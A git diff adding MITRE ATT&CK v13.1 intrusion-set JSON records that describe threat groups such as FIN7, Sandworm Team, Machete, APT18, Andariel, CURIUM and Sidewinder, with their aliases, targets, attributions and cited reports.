@@ -0,0 +1,105 @@ +{ + "type": "bundle", + "id": "bundle--36b989bc-9e59-45d2-8998-64a5ba4da37f", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-22T03:51:04.185Z", + "name": "FIN7", + "description": "[FIN7](https://attack.mitre.org/groups/G0046) is a financially-motivated threat group that has been active since 2013 primarily targeting the U.S. retail, restaurant, and hospitality sectors, often using point-of-sale malware. A portion of [FIN7](https://attack.mitre.org/groups/G0046) was run out of a front company called Combi Security. Since 2020 [FIN7](https://attack.mitre.org/groups/G0046) shifted operations to a big game hunting (BGH) approach including use of [REvil](https://attack.mitre.org/software/S0496) ransomware and their own Ransomware as a Service (RaaS), Darkside. [FIN7](https://attack.mitre.org/groups/G0046) may be linked to the [Carbanak](https://attack.mitre.org/groups/G0008) Group, but there appears to be several groups using [Carbanak](https://attack.mitre.org/software/S0030) malware and are therefore tracked separately.(Citation: FireEye FIN7 March 2017)(Citation: FireEye FIN7 April 2017)(Citation: FireEye CARBANAK June 2017)(Citation: FireEye FIN7 Aug 2018)(Citation: CrowdStrike Carbon Spider August 2021)", + "aliases": [ + "FIN7", + "GOLD NIAGARA", + "ITG14", + "Carbon Spider" + ], + "x_mitre_deprecated": false, + "x_mitre_version": "2.2", + "x_mitre_contributors": [ + "Edward Millington" + ], + "type": "intrusion-set", + "id": "intrusion-set--3753cc21-2dae-4dfb-8481-d004e74502cc", + "created": "2017-05-31T21:32:09.460Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0046", + "external_id": "G0046" + }, + { + "source_name": "Carbon Spider", + "description": "(Citation: CrowdStrike Carbon Spider August 2021)" + }, + { + "source_name": "FIN7", + "description": "(Citation: FireEye 
FIN7 March 2017) (Citation: FireEye FIN7 April 2017) (Citation: Morphisec FIN7 June 2017) (Citation: FireEye FIN7 Shim Databases) (Citation: FireEye FIN7 Aug 2018)" + }, + { + "source_name": "GOLD NIAGARA", + "description": "(Citation: Secureworks GOLD NIAGARA Threat Profile)" + }, + { + "source_name": "FireEye CARBANAK June 2017", + "description": "Bennett, J., Vengerik, B. (2017, June 12). Behind the CARBANAK Backdoor. Retrieved June 11, 2018.", + "url": "https://www.fireeye.com/blog/threat-research/2017/06/behind-the-carbanak-backdoor.html" + }, + { + "source_name": "FireEye FIN7 April 2017", + "description": "Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing LNK. Retrieved April 24, 2017.", + "url": "https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html" + }, + { + "source_name": "FireEye FIN7 Aug 2018", + "description": "Carr, N., et al. (2018, August 01). On the Hunt for FIN7: Pursuing an Enigmatic and Evasive Global Criminal Operation. Retrieved August 23, 2018.", + "url": "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html" + }, + { + "source_name": "Secureworks GOLD NIAGARA Threat Profile", + "description": "CTU. (n.d.). GOLD NIAGARA. Retrieved September 21, 2021.", + "url": "https://www.secureworks.com/research/threat-profiles/gold-niagara" + }, + { + "source_name": "FireEye FIN7 Shim Databases", + "description": "Erickson, J., McWhirt, M., Palombo, D. (2017, May 3). To SDB, Or Not To SDB: FIN7 Leveraging Shim Databases for Persistence. Retrieved July 18, 2017.", + "url": "https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html" + }, + { + "source_name": "Morphisec FIN7 June 2017", + "description": "Gorelik, M.. (2017, June 9). FIN7 Takes Another Bite at the Restaurant Industry. 
Retrieved July 13, 2017.", + "url": "http://blog.morphisec.com/fin7-attacks-restaurant-industry" + }, + { + "source_name": "ITG14", + "description": "ITG14 shares campaign overlap with [FIN7](https://attack.mitre.org/groups/G0046).(Citation: IBM Ransomware Trends September 2020)" + }, + { + "source_name": "CrowdStrike Carbon Spider August 2021", + "description": "Loui, E. and Reynolds, J. (2021, August 30). CARBON SPIDER Embraces Big Game Hunting, Part 1. Retrieved September 20, 2021.", + "url": "https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-1/" + }, + { + "source_name": "FireEye FIN7 March 2017", + "description": "Miller, S., et al. (2017, March 7). FIN7 Spear Phishing Campaign Targets Personnel Involved in SEC Filings. Retrieved March 8, 2017.", + "url": "https://web.archive.org/web/20180808125108/https:/www.fireeye.com/blog/threat-research/2017/03/fin7_spear_phishing.html" + }, + { + "source_name": "IBM Ransomware Trends September 2020", + "description": "Singleton, C. and Kiefer, C. (2020, September 28). Ransomware 2020: Attack Trends Affecting Organizations Worldwide. Retrieved September 20, 2021.", + "url": "https://securityintelligence.com/posts/ransomware-2020-attack-trends-new-techniques-affecting-organizations-worldwide/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_domains": [ + "enterprise-attack", + "ics-attack" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--381fcf73-60f6-4ab2-9991-6af3cbc35192.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--381fcf73-60f6-4ab2-9991-6af3cbc35192.json new file mode 100644 index 0000000000000000000000000000000000000000..95137f84ca957d7b2bb7862288418ed8665924b3 --- /dev/null 
+++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--381fcf73-60f6-4ab2-9991-6af3cbc35192.json 
@@ -0,0 +1,141 @@ +{ + "type": "bundle", + "id": "bundle--2ef879cb-8c0f-4c54-9a14-e2a306144316", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-08T22:12:31.238Z", + "name": "Sandworm Team", + "description": "[Sandworm Team](https://attack.mitre.org/groups/G0034) is a destructive threat group that has been attributed to Russia's General Staff Main Intelligence Directorate (GRU) Main Center for Special Technologies (GTsST) military unit 74455.(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: UK NCSC Olympic Attacks October 2020) This group has been active since at least 2009.(Citation: iSIGHT Sandworm 2014)(Citation: CrowdStrike VOODOO BEAR)(Citation: USDOJ Sandworm Feb 2020)(Citation: NCSC Sandworm Feb 2020)\n\nIn October 2020, the US indicted six GRU Unit 74455 officers associated with [Sandworm Team](https://attack.mitre.org/groups/G0034) for the following cyber operations: the 2015 and 2016 attacks against Ukrainian electrical companies and government organizations, the 2017 worldwide [NotPetya](https://attack.mitre.org/software/S0368) attack, targeting of the 2017 French presidential campaign, the 2018 [Olympic Destroyer](https://attack.mitre.org/software/S0365) attack against the Winter Olympic Games, the 2018 operation against the Organisation for the Prohibition of Chemical Weapons, and attacks against the country of Georgia in 2018 and 2019.(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: UK NCSC Olympic Attacks October 2020) Some of these were conducted with the assistance of GRU Unit 26165, which is also referred to as [APT28](https://attack.mitre.org/groups/G0007).(Citation: US District Court Indictment GRU Oct 2018)", + "aliases": [ + "Sandworm Team", + "ELECTRUM", + "Telebots", + "IRON VIKING", + "BlackEnergy (Group)", + "Quedagh", + "Voodoo Bear", + "IRIDIUM" + ], + "x_mitre_deprecated": false, + "x_mitre_version": "3.0", + "x_mitre_contributors": [ + "Dragos Threat 
Intelligence" + ], + "type": "intrusion-set", + "id": "intrusion-set--381fcf73-60f6-4ab2-9991-6af3cbc35192", + "created": "2017-05-31T21:32:04.588Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0034", + "external_id": "G0034" + }, + { + "source_name": "Voodoo Bear", + "description": "(Citation: CrowdStrike VOODOO BEAR)(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: UK NCSC Olympic Attacks October 2020)" + }, + { + "source_name": "ELECTRUM", + "description": "(Citation: Dragos ELECTRUM)(Citation: UK NCSC Olympic Attacks October 2020)" + }, + { + "source_name": "Sandworm Team", + "description": "(Citation: iSIGHT Sandworm 2014) (Citation: F-Secure BlackEnergy 2014) (Citation: InfoSecurity Sandworm Oct 2014)(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: UK NCSC Olympic Attacks October 2020)" + }, + { + "source_name": "Quedagh", + "description": "(Citation: iSIGHT Sandworm 2014) (Citation: F-Secure BlackEnergy 2014)(Citation: UK NCSC Olympic Attacks October 2020)" + }, + { + "source_name": "IRIDIUM", + "description": "(Citation: Microsoft Prestige ransomware October 2022)" + }, + { + "source_name": "BlackEnergy (Group)", + "description": "(Citation: NCSC Sandworm Feb 2020)(Citation: UK NCSC Olympic Attacks October 2020)" + }, + { + "source_name": "Telebots", + "description": "(Citation: NCSC Sandworm Feb 2020)(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: UK NCSC Olympic Attacks October 2020)" + }, + { + "source_name": "IRON VIKING", + "description": "(Citation: Secureworks IRON VIKING )(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: UK NCSC Olympic Attacks October 2020)" + }, + { + "source_name": "US District Court Indictment GRU Oct 2018", + "description": "Brady, S . (2018, October 3). 
Indictment - United States vs Aleksei Sergeyevich Morenets, et al.. Retrieved October 1, 2020.", + "url": "https://www.justice.gov/opa/page/file/1098481/download" + }, + { + "source_name": "Dragos ELECTRUM", + "description": "Dragos. (2017, January 1). ELECTRUM Threat Profile. Retrieved June 10, 2020.", + "url": "https://www.dragos.com/resource/electrum/" + }, + { + "source_name": "F-Secure BlackEnergy 2014", + "description": "F-Secure Labs. (2014). BlackEnergy & Quedagh: The convergence of crimeware and APT attacks. Retrieved March 24, 2016.", + "url": "https://blog-assets.f-secure.com/wp-content/uploads/2019/10/15163408/BlackEnergy_Quedagh.pdf" + }, + { + "source_name": "iSIGHT Sandworm 2014", + "description": "Hultquist, J.. (2016, January 7). Sandworm Team and the Ukrainian Power Authority Attacks. Retrieved October 6, 2017.", + "url": "https://www.fireeye.com/blog/threat-research/2016/01/ukraine-and-sandworm-team.html" + }, + { + "source_name": "CrowdStrike VOODOO BEAR", + "description": "Meyers, A. (2018, January 19). Meet CrowdStrike\u2019s Adversary of the Month for January: VOODOO BEAR. Retrieved May 22, 2018.", + "url": "https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-january-voodoo-bear/" + }, + { + "source_name": "Microsoft Prestige ransomware October 2022", + "description": "MSTIC. (2022, October 14). New \u201cPrestige\u201d ransomware impacts organizations in Ukraine and Poland. Retrieved January 19, 2023.", + "url": "https://www.microsoft.com/en-us/security/blog/2022/10/14/new-prestige-ransomware-impacts-organizations-in-ukraine-and-poland/" + }, + { + "source_name": "InfoSecurity Sandworm Oct 2014", + "description": "Muncaster, P.. (2014, October 14). Microsoft Zero Day Traced to Russian \u2018Sandworm\u2019 Hackers. Retrieved October 6, 2017.", + "url": "https://www.infosecurity-magazine.com/news/microsoft-zero-day-traced-russian/" + }, + { + "source_name": "NCSC Sandworm Feb 2020", + "description": "NCSC. 
(2020, February 20). NCSC supports US advisory regarding GRU intrusion set Sandworm. Retrieved June 10, 2020.", + "url": "https://www.ncsc.gov.uk/news/ncsc-supports-sandworm-advisory" + }, + { + "source_name": "USDOJ Sandworm Feb 2020", + "description": "Pompeo, M. (2020, February 20). The United States Condemns Russian Cyber Attack Against the Country of Georgia. Retrieved June 18, 2020.", + "url": "https://2017-2021.state.gov/the-united-states-condemns-russian-cyber-attack-against-the-country-of-georgia//index.html" + }, + { + "source_name": "US District Court Indictment GRU Unit 74455 October 2020", + "description": "Scott W. Brady. (2020, October 15). United States vs. Yuriy Sergeyevich Andrienko et al.. Retrieved November 25, 2020.", + "url": "https://www.justice.gov/opa/press-release/file/1328521/download" + }, + { + "source_name": "Secureworks IRON VIKING ", + "description": "Secureworks. (2020, May 1). IRON VIKING Threat Profile. Retrieved June 10, 2020.", + "url": "https://www.secureworks.com/research/threat-profiles/iron-viking" + }, + { + "source_name": "UK NCSC Olympic Attacks October 2020", + "description": "UK NCSC. (2020, October 19). UK exposes series of Russian cyber attacks against Olympic and Paralympic Games . Retrieved November 30, 2020.", + "url": "https://www.gov.uk/government/news/uk-exposes-series-of-russian-cyber-attacks-against-olympic-and-paralympic-games" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_domains": [ + "ics-attack", + "enterprise-attack", + "mobile-attack" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--38863958-a201-4ce1-9dbe-539b0b6804e0.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--38863958-a201-4ce1-9dbe-539b0b6804e0.json new file mode 100644 index 0000000000000000000000000000000000000000..4af05461ce925d180eb4db11fa6755edca58e135 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--38863958-a201-4ce1-9dbe-539b0b6804e0.json 
@@ -0,0 +1,71 @@ +{ + "type": "bundle", + "id": "bundle--ada9b832-60ac-467d-bd96-010d170d0ee2", + "spec_version": "2.0", + "objects": [ + { + "aliases": [ + "Machete", + "APT-C-43", + "El Machete" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Matias Nicolas Porolli, ESET" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "intrusion-set--38863958-a201-4ce1-9dbe-539b0b6804e0", + "type": "intrusion-set", + "created": "2019-09-13T12:37:10.394Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "G0095", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0095" + }, + { + "source_name": "Machete", + "description": "(Citation: Securelist Machete Aug 2014)(Citation: ESET Machete July 2019)(" + }, + { + "source_name": "APT-C-43", + "description": "(Citation: 360 Machete Sep 2020)" + }, + { + "source_name": "El Machete", + "description": "(Citation: Cylance Machete Mar 2017)" + }, + { + "description": "The Cylance Threat Research Team. (2017, March 22). El Machete's Malware Attacks Cut Through LATAM. Retrieved September 13, 2019.", + "url": "https://threatvector.cylance.com/en_us/home/el-machete-malware-attacks-cut-through-latam.html", + "source_name": "Cylance Machete Mar 2017" + }, + { + "source_name": "Securelist Machete Aug 2014", + "url": "https://securelist.com/el-machete/66108/", + "description": "Kaspersky Global Research and Analysis Team. (2014, August 20). El Machete. Retrieved September 13, 2019." + }, + { + "source_name": "ESET Machete July 2019", + "url": "https://www.welivesecurity.com/wp-content/uploads/2019/08/ESET_Machete.pdf", + "description": "ESET. (2019, July). MACHETE JUST GOT SHARPER Venezuelan government institutions under attack. Retrieved September 13, 2019." 
+ }, + { + "source_name": "360 Machete Sep 2020", + "url": "https://blog.360totalsecurity.com/en/apt-c-43-steals-venezuelan-military-secrets-to-provide-intelligence-support-for-the-reactionaries-hpreact-campaign/", + "description": "kate. (2020, September 25). APT-C-43 steals Venezuelan military secrets to provide intelligence support for the reactionaries \u2014 HpReact campaign. Retrieved November 20, 2020." + } + ], + "modified": "2021-10-06T19:26:47.988Z", + "name": "Machete", + "description": "[Machete](https://attack.mitre.org/groups/G0095) is a suspected Spanish-speaking cyber espionage group that has been active since at least 2010. It has primarily focused its operations within Latin America, with a particular emphasis on Venezuela, but also in the US, Europe, Russia, and parts of Asia. [Machete](https://attack.mitre.org/groups/G0095) generally targets high-profile organizations such as government institutions, intelligence services, and military units, as well as telecommunications and power companies.(Citation: Cylance Machete Mar 2017)(Citation: Securelist Machete Aug 2014)(Citation: ESET Machete July 2019)(Citation: 360 Machete Sep 2020)", + "x_mitre_version": "2.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--38fd6a28-3353-4f2b-bb2b-459fecd5c648.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--38fd6a28-3353-4f2b-bb2b-459fecd5c648.json new file mode 100644 index 0000000000000000000000000000000000000000..a53fedbc92a386c10231317ad5d2da90f0edd8cd --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--38fd6a28-3353-4f2b-bb2b-459fecd5c648.json 
@@ -0,0 +1,68 @@ +{ + "type": "bundle", + "id": "bundle--f21dc752-c30f-4e1d-8ee6-dc6a3880da7a", + "spec_version": "2.0", + "objects": [ + { + "aliases": [ + "APT18", + "TG-0416", + "Dynamite Panda", + "Threat Group-0416" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "intrusion-set--38fd6a28-3353-4f2b-bb2b-459fecd5c648", + "type": "intrusion-set", + "created": "2017-05-31T21:31:57.733Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0026", + "external_id": "G0026" + }, + { + "source_name": "APT18", + "description": "(Citation: ThreatStream Evasion Analysis)(Citation: Anomali Evasive Maneuvers July 2015)" + }, + { + "source_name": "TG-0416", + "description": "(Citation: ThreatStream Evasion Analysis)(Citation: Anomali Evasive Maneuvers July 2015)" + }, + { + "source_name": "Dynamite Panda", + "description": "(Citation: ThreatStream Evasion Analysis)(Citation: Anomali Evasive Maneuvers July 2015)" + }, + { + "source_name": "Threat Group-0416", + "description": "(Citation: ThreatStream Evasion Analysis)" + }, + { + "url": "http://www.secureworks.com/resources/blog/where-you-at-indicators-of-lateral-movement-using-at-exe-on-windows-7-systems/", + "description": "Carvey, H.. (2014, September 2). Where you AT?: Indicators of lateral movement using at.exe on Windows 7 systems. Retrieved January 25, 2016.", + "source_name": "Dell Lateral Movement" + }, + { + "url": "https://www.threatstream.com/blog/evasive-maneuvers-the-wekby-group-attempts-to-evade-analysis-via-custom-rop", + "description": "Shelmire, A.. (2015, July 6). Evasive Maneuvers. 
Retrieved January 22, 2016.", + "source_name": "ThreatStream Evasion Analysis" + }, + { + "source_name": "Anomali Evasive Maneuvers July 2015", + "url": "https://www.anomali.com/blog/evasive-maneuvers-the-wekby-group-attempts-to-evade-analysis-via-custom-rop", + "description": "Shelmire, A. (2015, July 06). Evasive Maneuvers by the Wekby group with custom ROP-packing and DNS covert channels. Retrieved November 15, 2018." + } + ], + "modified": "2020-03-30T18:46:16.853Z", + "name": "APT18", + "description": "[APT18](https://attack.mitre.org/groups/G0026) is a threat group that has operated since at least 2009 and has targeted a range of industries, including technology, manufacturing, human rights groups, government, and medical. (Citation: Dell Lateral Movement)", + "x_mitre_version": "2.1", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--39d6890e-7f23-4474-b8ef-e7b0343c5fc8.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--39d6890e-7f23-4474-b8ef-e7b0343c5fc8.json new file mode 100644 index 0000000000000000000000000000000000000000..ca75847756231ef94f7714d50fd8514390f10b0d --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--39d6890e-7f23-4474-b8ef-e7b0343c5fc8.json 
@@ -0,0 +1,79 @@ +{ + "type": "bundle", + "id": "bundle--670740b9-2d8e-40cd-83b6-db0653b67aca", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-11-30T22:51:40.270Z", + "name": "Andariel", + "description": "[Andariel](https://attack.mitre.org/groups/G0138) is a North Korean state-sponsored threat group that has been active since at least 2009. [Andariel](https://attack.mitre.org/groups/G0138) has primarily focused its operations--which have included destructive attacks--against South Korean government agencies, military organizations, and a variety of domestic companies; they have also conducted cyber financial operations against ATMs, banks, and cryptocurrency exchanges. [Andariel](https://attack.mitre.org/groups/G0138)'s notable activity includes Operation Black Mine, Operation GoldenAxe, and Campaign Rifle.(Citation: FSI Andariel Campaign Rifle July 2017)(Citation: IssueMakersLab Andariel GoldenAxe May 2017)(Citation: AhnLab Andariel Subgroup of Lazarus June 2018)(Citation: TrendMicro New Andariel Tactics July 2018)(Citation: CrowdStrike Silent Chollima Adversary September 2021)\n\n[Andariel](https://attack.mitre.org/groups/G0138) is considered a sub-set of [Lazarus Group](https://attack.mitre.org/groups/G0032), and has been attributed to North Korea's Reconnaissance General Bureau.(Citation: Treasury North Korean Cyber Groups September 2019)\n\nNorth Korean group definitions are known to have significant overlap, and some security researchers report all North Korean state-sponsored cyber activity under the name [Lazarus Group](https://attack.mitre.org/groups/G0032) instead of tracking clusters or subgroups.", + "aliases": [ + "Andariel", + "Silent Chollima" + ], + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_contributors": [ + "Kyoung-ju Kwak (S2W)" + ], + "type": "intrusion-set", + "id": "intrusion-set--39d6890e-7f23-4474-b8ef-e7b0343c5fc8", + "created": "2021-09-29T15:10:19.236Z", + "created_by_ref": 
"identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0138", + "external_id": "G0138" + }, + { + "source_name": "Silent Chollima", + "description": "(Citation: CrowdStrike Silent Chollima Adversary September 2021)" + }, + { + "source_name": "Andariel", + "description": "(Citation: FSI Andariel Campaign Rifle July 2017)" + }, + { + "source_name": "AhnLab Andariel Subgroup of Lazarus June 2018", + "description": "AhnLab. (2018, June 23). Targeted attacks by Andariel Threat Group, a subgroup of the Lazarus. Retrieved September 29, 2021.", + "url": "http://download.ahnlab.com/global/brochure/%5BAnalysis%5DAndariel_Group.pdf" + }, + { + "source_name": "TrendMicro New Andariel Tactics July 2018", + "description": "Chen, Joseph. (2018, July 16). New Andariel Reconnaissance Tactics Uncovered. Retrieved September 29, 2021.", + "url": "https://www.trendmicro.com/en_us/research/18/g/new-andariel-reconnaissance-tactics-hint-at-next-targets.html" + }, + { + "source_name": "CrowdStrike Silent Chollima Adversary September 2021", + "description": "CrowdStrike. (2021, September 29). Silent Chollima Adversary Profile. Retrieved September 29, 2021.", + "url": "https://adversary.crowdstrike.com/en-US/adversary/silent-chollima/" + }, + { + "source_name": "FSI Andariel Campaign Rifle July 2017", + "description": "FSI. (2017, July 27). Campaign Rifle - Andariel, the Maiden of Anguish. Retrieved September 29, 2021.", + "url": "https://www.fsec.or.kr/user/bbs/fsec/163/344/bbsDataView/1680.do" + }, + { + "source_name": "IssueMakersLab Andariel GoldenAxe May 2017", + "description": "IssueMakersLab. (2017, May 1). Operation GoldenAxe. Retrieved September 29, 2021.", + "url": "http://www.issuemakerslab.com/research3/" + }, + { + "source_name": "Treasury North Korean Cyber Groups September 2019", + "description": "US Treasury . (2019, September 13). 
Treasury Sanctions North Korean State-Sponsored Malicious Cyber Groups. Retrieved September 29, 2021.", + "url": "https://home.treasury.gov/news/press-releases/sm774" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--3ea7add5-5b8f-45d8-b1f1-905d2729d62a.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--3ea7add5-5b8f-45d8-b1f1-905d2729d62a.json new file mode 100644 index 0000000000000000000000000000000000000000..f90b09397ff06cde9a5f6c4f42c0e4e3de5da66b --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--3ea7add5-5b8f-45d8-b1f1-905d2729d62a.json 
@@ -0,0 +1,42 @@ +{ + "type": "bundle", + "id": "bundle--18b3f168-44f9-4dfc-9c4d-9a0fc79a8e88", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-04-12T13:21:41.276Z", + "name": "CURIUM", + "description": "[CURIUM](https://attack.mitre.org/groups/G1012) is an Iranian threat group first reported in November 2021 that has invested in building a relationship with potential targets via social media over a period of months to establish trust and confidence before sending malware. Security researchers note [CURIUM](https://attack.mitre.org/groups/G1012) has demonstrated great patience and persistence by chatting with potential targets daily and sending benign files to help lower their security consciousness.(Citation: Microsoft Iranian Threat Actor Trends November 2021)", + "aliases": [ + "CURIUM" + ], + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "type": "intrusion-set", + "id": "intrusion-set--3ea7add5-5b8f-45d8-b1f1-905d2729d62a", + "created": "2023-01-13T20:51:13.494Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G1012", + "external_id": "G1012" + }, + { + "source_name": "Microsoft Iranian Threat Actor Trends November 2021", + "description": "MSTIC. (2021, November 16). Evolving trends in Iranian threat actor activity \u2013 MSTIC presentation at CyberWarCon 2021. Retrieved January 12, 2023.", + "url": "https://www.microsoft.com/en-us/security/blog/2021/11/16/evolving-trends-in-iranian-threat-actor-activity-mstic-presentation-at-cyberwarcon-2021" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--3fc023b2-c5cc-481d-9c3e-70141ae1a87e.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--3fc023b2-c5cc-481d-9c3e-70141ae1a87e.json new file mode 100644 index 0000000000000000000000000000000000000000..0a87fe99a6aaea57165540be2243508132104b6e --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--3fc023b2-c5cc-481d-9c3e-70141ae1a87e.json 
@@ -0,0 +1,66 @@ +{ + "type": "bundle", + "id": "bundle--c7bd8b1a-abd1-4784-8975-479ecf42cefc", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-22T05:31:54.382Z", + "name": "Sidewinder", + "description": "[Sidewinder](https://attack.mitre.org/groups/G0121) is a suspected Indian threat actor group that has been active since at least 2012. They have been observed targeting government, military, and business entities throughout Asia, primarily focusing on Pakistan, China, Nepal, and Afghanistan.(Citation: ATT Sidewinder January 2021)(Citation: Securelist APT Trends April 2018)(Citation: Cyble Sidewinder September 2020)", + "aliases": [ + "Sidewinder", + "T-APT-04", + "Rattlesnake" + ], + "x_mitre_deprecated": false, + "x_mitre_version": "1.1", + "x_mitre_contributors": [ + "Lacework Labs", + "Daniyal Naeem, BT Security" + ], + "type": "intrusion-set", + "id": "intrusion-set--3fc023b2-c5cc-481d-9c3e-70141ae1a87e", + "created": "2021-01-27T15:57:11.183Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0121", + "external_id": "G0121" + }, + { + "source_name": "T-APT-04", + "description": "(Citation: Cyble Sidewinder September 2020)" + }, + { + "source_name": "Rattlesnake", + "description": "(Citation: Cyble Sidewinder September 2020)" + }, + { + "source_name": "Cyble Sidewinder September 2020", + "description": "Cyble. (2020, September 26). SideWinder APT Targets with futuristic Tactics and Techniques. Retrieved January 29, 2021.", + "url": "https://cybleinc.com/2020/09/26/sidewinder-apt-targets-with-futuristic-tactics-and-techniques/" + }, + { + "source_name": "Securelist APT Trends April 2018", + "description": "Global Research and Analysis Team . (2018, April 12). APT Trends report Q1 2018. 
Retrieved January 27, 2021.", + "url": "https://securelist.com/apt-trends-report-q1-2018/85280/" + }, + { + "source_name": "ATT Sidewinder January 2021", + "description": "Hegel, T. (2021, January 13). A Global Perspective of the SideWinder APT. Retrieved January 27, 2021.", + "url": "https://cdn-cybersecurity.att.com/docs/global-perspective-of-the-sidewinder-apt.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--420ac20b-f2b9-42b8-aa1a-6d4b72895ca4.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--420ac20b-f2b9-42b8-aa1a-6d4b72895ca4.json new file mode 100644 index 0000000000000000000000000000000000000000..42491816dc6bd26c31c85a916e9a2a26881ad8ad --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--420ac20b-f2b9-42b8-aa1a-6d4b72895ca4.json 
